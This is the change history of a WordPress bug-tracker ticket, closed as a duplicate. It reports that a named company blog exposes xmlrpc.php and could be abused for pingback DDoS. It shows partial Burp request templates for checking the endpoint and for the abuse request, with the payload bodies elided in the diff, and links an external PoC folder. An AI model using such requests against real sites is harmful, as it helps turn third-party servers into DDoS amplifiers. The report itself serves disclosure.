Changes between Initial Version and Version 4 of Ticket #47551
- Timestamp:
- 06/17/2019 03:27:31 PM (7 years ago)
Legend:
- Unmodified
- Added
- Removed
- Modified
-
Ticket #47551
-
Property
Status
changed from
newtoclosed - Property Owner set to marybaum
-
Property
Milestone
changed from
Awaiting Reviewto - Property Keywords needs-patch removed
-
Property
Resolution
changed from
toduplicate
-
Property
Status
changed from
-
Ticket #47551 – Description
initial v4 3 3 Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The website https://blog.optimizely.com/ has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts. 4 4 In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below. 5 5 {{{ 6 6 POST /xmlrpc.php HTTP/1.1 7 7 Host: blog.optimizely.com … … 21 21 </params> 22 22 </methodCall> 23 23 }}} 24 24 Notice that a successful response is received showing that the xmlrpc.php file is enabled. 25 25 Now, considering the domain https://blog.optimizely.com, the xmlrpc.php file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below. … … 36 36 37 37 http request 38 {{{ 38 39 POST /xmlrpc.php HTTP/1.1 39 40 Host: blog.optimizely.com … … 55 56 </params> 56 57 </methodCall> 57 58 }}} 58 59 NOte : Please find attachments for POc In the following URL : https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn